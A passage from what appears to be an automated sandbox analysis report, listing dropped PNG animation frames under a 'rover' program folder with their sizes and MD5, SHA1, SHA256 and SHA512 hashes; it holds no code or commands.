                                                                                                                                                                                                                                                                                                                                      a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.010.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e0436699f1df69af9e24efb9092d60a9

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      d2c6eed1355a8428c5447fa2ecdd6a3067d6743e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.011.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f45528dfb8759e78c4e933367c2e4ea8

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      836962ef96ed4597dbc6daa38042c2438305693a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      31d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      16561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.012.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      195bb4fe6012b2d9e5f695269970fce5

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a62ef137a9bc770e22de60a8f68b6cc9f36e343b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      8fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.013.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3c0ef957c7c8d205fca5dae28b9c7b10

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      4b5927bf1cf8887956152665143f4589d0875d58

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      3e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.014.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      2445d5c72c6344c48065349fa4e1218c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      89df27d1b534eb47fae941773d8fce0e0ee1d036

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.015.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      678d78316b7862a9102b9245b3f4a492

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b272d1d005e06192de047a652d16efa845c7668c

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      26fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.016.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      aa4c8764a4b2a5c051e0d7009c1e7de3

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5e67091400cba112ac13e3689e871e5ce7a134fe

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      1da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.017.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7c216e06c4cb8d9e499b21b1a05c3e4a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      d42dde78eb9548de2171978c525194f4fa2c413c

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      6ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.018.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      e17061f9a7cb1006a02537a04178464d

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      810b350f495f82587134cdf16f2bd5caebc36cf5

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Come\Come.019.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      63dbf53411402e2a121c3822194a1347

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      86a2e77e667267791054021c459c1607c9b8dbb6

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      47b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.001.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0197012f782ed1195790f9bf0884ca0d

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      fc0115826fbaf8cefa478e506b46b7b66a804f13

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.002.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      b45ff2750a41e0d8ca6a597fbcd41b57

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cf162e0371a1a394803a1f3145d5e9b7cddd5088

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      727a2aac0697bcfecdc56dc4507516f9f64c5faa426f0ce69f7e607b74c4e1f4

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      82a9a3fc7dfae0ed6bf665c4f369f053af372551c1871d6b3dc775f447ba727e921ab831f8acd712cc31b66156eac643859404f05386e2592a15954fb78d87a3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.003.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      95113a3147eeeb845523bdb4f6b211b8

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f817f20af3b5168a61982554bf683f3be0648da1

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      800f0c501905bc4257415ee8bed738f897273600c721e80a15bcfbb2e2b3b847

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4e55d9ced90f255b20890595f8e07ccaeedcbe08aed6303336eae7f66df1e50429259b62c556d5d8b179f7f9be22216c1592ba772e2cebd257b3401109f45cc4

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.004.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      8ce29c28d4d6bda14b90afb17a29a7f9

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      94a28ce125f63fcd5c7598f7cb9e183732ebdc16

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      eb9abbeddd27ce6fa82f1f7437309209450f9f8412eb395923a45d946d9c50b1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      037babd109af1a2c05d7db87536bec41e3075d1120a37384d66f9460d8790be5732f8bbe6a2a13db3d017806fed88945f2a98697b586284b62760252276a8077

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.005.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      83ddcf0464fd3f42c5093c58beb8f941

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      e8516b6468a42a450235bcc7d895f80f4f1ca189

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ebb3efda95b2d2588983742f96f51bdbcb9d87a6949f2c37ea11f509d236a536

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      51a6925bc9558f9ba232b85623d78f975d1c18c1990ce62153aa57a742e0897c72fc0665213024f8d5af96e56cc47eb384ee8d231910fdef876a0889b52a59d8

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.006.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      6f530b0a64361ef7e2ce6c28cb44b869

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ca087fc6ed5440180c7240c74988c99e4603ce35

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      457626948266abd4f0dcda6a09c448bb20cce3596b52076b8d90e1c626037dc9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      dc3d809eab3bfa7c65c35a36d55097e09fbefa2f6de962ae02c58540f6c88b3ca9be3361f3ec37b8ce7927e020463055c455f2e93baa3a3c12096b55abcab6d3

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.007.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      aac6fc45cfb83a6279e7184bcd4105d6

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b51ab2470a1eedad86cc3d93152360d72cb87549

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      a59bb83276f003dd149c2143a5a70f012212c709e72af283209adfb85a0835b1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      7020ba8d918398bc2d5e6ea4aaea007d576d4c3577adab80259336505b06e8163d0afde5a7b4d802ba2dab9ec9c757e88eb37780246c35d38e5fed8648bbf3a1

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.008.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      fa73c710edc1f91ecacba2d8016c780c

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      19fafe993ee8db2e90e81dbb92e00eb395f232b9

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      cca9c6b8e0df9e09523ab59021ffff62b29273cae487335c87b569e8483aaae2

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      f73b2ee270348247db1d7fea937cd69125afa6aef926dc5c1cef14b955630711fe106d56270172448d739014ae4fd7d221007aaa422b3625aa524b812baa10a2

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.009.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3faefb490e3745520c08e7aa5cc0a693

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      357ffa8b2d4797d8d6cf67c0c84818ebc746ce0a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      6ba5254c0b10b6939d5cd80f3ab87757143896d20fd8e014c3fcca35657e076b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      714d9d32ab070a992d84dc597a086afb7fe040300c33c25f9acdd27f5f8894145a5f9f8654b522c04a9cb1babeb25000fac25b01b1c820d4cfe8d67e40cd72a7

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.010.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      1bed8b0629ce72b595017371336ac688

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9180c6c3d0bdd3470fa38854de8af238bcc31d42

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      a8cc3da0e5b87f10e6acd766bbd096dbe40ca60507867ec8ea66c56436fa6cd7

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4483b0ac1e83ef94f982aa7cf92767a24165060e1d492a87290a2301bcd2654e1c2e5d5cd637151408cac576d74d529b7d05e7e12b27e02afd17e24029a92ceb

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Speak\Speak.011.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      c9eccb5ce7e65fd1eff7aba4a6fd43e8

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      cd71011e1172a157627e1595cc7ce4888370a765

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      a4045f846f5b3bb0856dbfdca78b5871433beefccb1416a2824e8dccce9f5975

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      3b07f14cbc06f2a4a75067e09c04c760af324ebe2de5c51c88648b184337aad48d319c2753bc9987ebb2094719d92a0f87d7c0fd84c4d893dd8351e7dc6de3f8

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.001.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      136be0b759f73a00e2d324a3073f63b7

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b3f03f663c8757ba7152f95549495e4914dc75db

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      c9b925e1f1409ddaa3aadf1ae7c2fb3310b69fb931190b7dc2f274f517fe38fc

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      263911753deffbce295dda3f311225edeb375555b1db2771477167600573bea78719f6294960dc5c5d95885194412dd0f133bae75a30e16556377263165b3723

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.002.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      f8f8ea9dd52781d7fa6610484aff1950

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      973f8c25b7b5e382820ce479668eac30ed2f5707

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      209e9d1fb6a814edfa4f8128d4a2168b274ea0eeb965a57f3c8b9695417a1bf1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      4f4e379afff8850eec6e4f3d165eba60f6916569ee7561b8bbf5a6bfeda27dbbcc0687ce02bece412616204f89861d23a92055a226cea14a29c53c653919c094

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.003.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      fb73acc1924324ca53e815a46765be0b

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      62c0a21b74e7b72a064e4faf1f8799ed37466a19

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      5488954fe5b4d87dee40dd68cc1d940d2395a52dc52d1c77f40cd2342b97efd8

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ea3ba299ca07850af45a29e2f88aece9163c13f4921a1fc05d930c008bc017b698c9fb987120147465a53fe0c0848926f543081716d5f877efa5a34b10822895

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.004.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      6da7cf42c4bc126f50027c312ef9109a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      8b31ab8b7b01074257ec50eb4bc0b89259e63a31

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      2ebdf7d755b442de775819b0bcfe7bdd06fda92f6ad36dcfdeaab107f58f23df

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      5c9783a8c14c6654db2a9a7818d4376fc3b2aeab9820539d20353018d90f734652ebba8052184b62f0e17f8f094da28c2bdfc73a0c707036fb5f923ed25625d9

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.005.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d9d3c74ac593d5598c3b3bceb2f25b1d

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      df14dee30599d5d6d67a34d397b993494e66700e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      2cba290a8c42f664a0e1a8e571e27bc846024fa7da9f7adc773a471ef74046bc

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      de70858da11efb89e7db55762827f8c1d4b55aff14faea8ffd8a5f15d32d6956f6ca4a3fdd9ffd75906a818af81ba9c7ef056df7c8cec4076308df94ff3207ac

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\Tired\Tired.006.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3071c94f1209b190ec26913a36f30659

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      d76fbfbc4ddd17383b6a716f24d137a8dc7ff610

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      89868008f5e5c55e5dd5982c15f105d11b9d3603ab45395dde0ec1c5ce61e683

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      bd21f269dd92ab826caa6085bf79f17b6c9b6c4b660d03913295611bae590f277a9a0a0e39fa281737fcd9cfbbb6a5c8f02287d316954badca394e730bad72f4

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_1Idle\_1Idle.003.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      533bc8e9ad951ba6d05c35a829e89156

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2709a1e51dcfa820a064ee3f0f34dea9cbc4fdee

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      0827a66c31995a144229ca6b9bee27de94fd5bba937d25efde961dfa544d5c91

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      d1d31f38686caacbe9453cc92c0bb88c4b085903b7b8eb455241839bec6b5ec4de0a0747cdfbcccb7468bb3bc6ca654e34a748762bb1a71e8e4b90285d397201

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.001.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      45a0aac72fc55fffe27d466536c373ec

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f7ac0b8623ade243228e36fe726e04cdfa338a29

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ddbc3734bc45511079e91c363b9267d4daff522009a64b20be1734dc4d04879e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      0ed605fc113093ee40ad7cd2de46f833edf6193cd1debb764660618c0f85dc8d99eab49492f1a2a364667bd41b53713e181c67540354860556c85e23daec2c84

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.002.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      c586c4b0b6df4952dc9d3e4f7886c957

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      3126971d599f40cd7766bfd4b05b7883f2f191e6

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      7674e8c9c94986472b5cd7f3f8de909bdae254b261bc9f46fabee5865d552ac0

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      bfb7fa9b971ff6371cc85bc057ffbc2fe7fbe1b82fa42d9b07eb0da6cff9ecc9e88857ca628d3a83aa0bb5cd23af590acdfe7f4082bc2e0e772a4adb0ecd05bb

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.003.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      3KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      c4c9f033f0a3cc8843a4538bc9a83c43

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      51a8de5ed309865ece0bbdb8abb1eb0d2234125a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      942949eeacb1fdaa07db3e854596ab4f7474098a9ac6d21da9f6f26b828de631

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      03175d6636f5a1863b7fdc21aeaabd49ed96eba06059fbaa7b6e4de63953da51dbeb407a66b46ece7630cb78235ae27cea660121d7b92f5cd178b5c10497baec

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.004.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7215d7438bacefed0eef154e8c1c2b32

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b3bf4719fc744ba4a2a95f82f0b3aabc51f50f95

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      998349b0c8689630c910cb9eab54dce77fafaa0a4cc8861d3a7e831d83408e68

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      b59460aed4f20fbea8ca48d68e1fe4451f40c219c4c776a9b2d0f727deaab98dde5e956ca4a30caed9c689cfd245cf24c5d91378e34d3c84bd4d2a9d6526777d

                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\rover\_9Idle\_9Idle.005.png
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

